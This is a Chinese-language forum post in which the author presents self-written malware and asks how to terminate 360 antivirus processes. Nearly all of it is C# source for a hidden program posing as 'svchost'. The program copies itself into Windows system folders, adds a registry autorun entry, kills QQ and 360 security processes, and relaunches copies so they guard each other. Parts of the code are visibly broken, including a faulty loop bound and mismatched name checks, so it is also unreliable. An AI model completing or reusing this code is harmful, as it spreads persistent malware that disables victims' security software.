写的恶意小软件,咋结束360进程?
思路如下:
1,自我复制。2,自我启动。3,进程守护。4,自动查杀。
只要能把所有杀毒软件的进程全干掉,余下的事就好办了,现在就卡在这一步了,郁闷,哪位大哥帮助下?先谢谢了。
代码如下:
//#define DEL
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using Microsoft.Win32;
using System.Diagnostics;
namespace explorer
{
public partial class svchost : Form
{
string SourceFile;
string FileName;
string[] TargetDirectorys = new string[] { "c:/windows/system32", "c:/windows/system", "c:/windows", "c:/winnt", "c:/winnt/system",
"c:/winnt/system32", "d:/windows", "d:/windows/system", "d:/windows/system32", "d:/winnt" };
int FileCount;
Process[] SysProcesses;
Random Rand;
List <string> UsablePath;
string AppProcessName;
List <string> KillProcessNames = new List <string>();
string LogFile = "";
public svchost()
{
InitializeComponent();
}
private void explorer_Load(object sender, EventArgs e)
{
try
{
//初始化
this.Opacity = 0;
this.Visible = false;
this.ShowInTaskbar = false;
SourceFile = Application.ExecutablePath;
FileName = SourceFile.Replace(Application.StartupPath, "").ToUpper();
FileCount = 0;
UsablePath = new List <string>();
AppProcessName = FileName.Replace("\\", "").Replace("/", "").Replace(".EXE", "");
Rand = new Random();
KillProcessNames.Add("QQ");
KillProcessNames.Add("360tray");
KillProcessNames.Add("360safe");
for (int i = 0; i < TargetDirectorys.Length; i++)
{
if (Directory.Exists(TargetDirectorys[i]))
{
LogFile = TargetDirectorys[i] + "/scv.log";
break;
}
}
LogFile = (LogFile == "" ? "scv.log" : LogFile);
WriteLog("启动进程于 " + DateTime.Now.ToString());
#if DEL
DeleteAllFiles();
#else
//1.实现自我复制,到windows文件夹
CopyMySelf();
//2.实现自启动
/*
* 这个很烦,写注册表时360都会提示一下,能不能反提示去掉?
*/
string firstPath = GetFirstPath();
if (firstPath != "")
{
SetAutoRun(AppProcessName, firstPath);
}
//3.查杀进程并实现两个进程互相保护
KillAndStartWatchProcess();
//4.启动定时查杀和进程守护
timKiller.Enabled = true;
timKiller.Start();
#endif
}
catch(Exception er)
{
try
{
WriteLog("系统发生错误于: " + DateTime.Now.ToString() + " 退出,错误信息: " + er.Message);
}
catch
{
}
finally
{
Application.Exit();
}
}
}
//1.实现自我复制,到windows文件夹
private void CopyMySelf()
{
for (int i = 0; i < TargetDirectorys.Length; i++)
{
if (Directory.Exists(TargetDirectorys[i]))
{
if (!File.Exists(TargetDirectorys[i] + FileName))
{
File.Copy(SourceFile, TargetDirectorys[i] + FileName);
WriteLog("复制文件 " + SourceFile + " 到 " + TargetDirectorys[i] + FileName);
FileCount++;
}
UsablePath.Add(TargetDirectorys[i] + FileName);
}
}
WriteLog("共复制了 " + FileCount.ToString() + " 个文件! \r\n");
}
//1-1.删除所有已复制的文件,此功能仅作备用,若想清除生成的文件时使用
private void DeleteAllFiles()
{
for (int i = 0; i < TargetDirectorys.Length; i++)
{
if (Directory.Exists(TargetDirectorys[i]))
{
if (File.Exists(TargetDirectorys[i] + FileName))
{
File.Delete(TargetDirectorys[i] + FileName);
WriteLog("删除文件 " + TargetDirectorys[i] + FileName);
FileCount++;
}
}
}
UsablePath.Clear();
File.Delete(LogFile);
WriteLog("共删除了 " + FileCount.ToString() + " 个文件!");
}
//2.设置自动重启项
private void SetAutoRun(string strKeyString, string strKeyValue)
{
int runKeysCount = 0;
RegistryKey runKey = Registry.CurrentUser.OpenSubKey("SoftWare\\Microsoft\\Windows\\CurrentVersion\\Run",true);
string[] runKeys = runKey.GetSubKeyNames();
for (int i = 0; i < runKeys.Length; i++)
{
if (runKeys[i].Trim().ToUpper() == FileName)
{
runKeysCount++;
break;
}
}
if (runKeysCount < 1)
{
runKey.SetValue(strKeyString, strKeyValue);
WriteLog("设置启动项: " + DateTime.Now.ToString());
}
}
//得到第一个可用的执行文件
private string GetFirstPath()
{
for (int i = 0; i < TargetDirectorys[i].Length; i++)
{
if (File.Exists(TargetDirectorys[i] + FileName))
{
return TargetDirectorys[i] + FileName;
}
}
return "";
}
//得到随机的一个可用文件
private string GetRandomPath()
{
if (UsablePath.Count > 1)
{
int r = Rand.Next(0, UsablePath.Count);
return UsablePath[r];
}
else if (UsablePath.Count == 1)
{
return UsablePath[0];
}
else
{
return "";
}
}
//启动另一个进程作为守护进程
private void KillAndStartWatchProcess()
{
SysProcesses = Process.GetProcesses();
int killProcessIndex = -1;
int existsProcessCount = 0;
for (int i = 0; i < SysProcesses.Length; i++)
{
if (SysProcesses[i].ProcessName == AppProcessName)
{
existsProcessCount++;
}
killProcessIndex = KillProcessNames.IndexOf(SysProcesses[i].ProcessName.ToUpper());
if (killProcessIndex != -1)
{
try
{
/*
* 杀360的相关进程时杀不掉
*/
SysProcesses[i].Kill();
}
catch (Exception Er)
{
WriteLog("进程名 " + SysProcesses[i].Name.ToString() + " 查杀有误,错误信息:" + Er.Message);
}
WriteLog("扫描到进程于 " + DateTime.Now.ToString());
}
}
if (existsProcessCount <= 1)
{
string appExecutePath = GetRandomPath();
if (appExecutePath != "")
{
Process.Start(appExecutePath);
WriteLog("启动守护进程: " + DateTime.Now.ToString() + " .\r\n----------------------------------------------------\r\n");
}
}
}
}
}
